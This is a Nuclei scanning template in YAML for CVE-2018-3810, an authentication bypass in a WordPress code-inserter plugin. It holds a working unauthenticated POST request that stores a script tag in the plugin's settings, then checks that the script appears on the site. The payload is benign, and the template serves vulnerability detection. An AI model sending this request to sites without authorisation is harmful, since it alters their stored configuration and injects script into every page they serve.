47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2018-3810
|
|
|
|
info:
|
|
name: WordPress Smart Google Code Inserter Authentication Bypass
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic
|
|
parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated
|
|
user to successfully update the inserted code.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/43420
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-3810
|
|
cwe-id: CWE-287
|
|
tags: wordpress,cve,cve2018,google
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
|
|
|
|
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|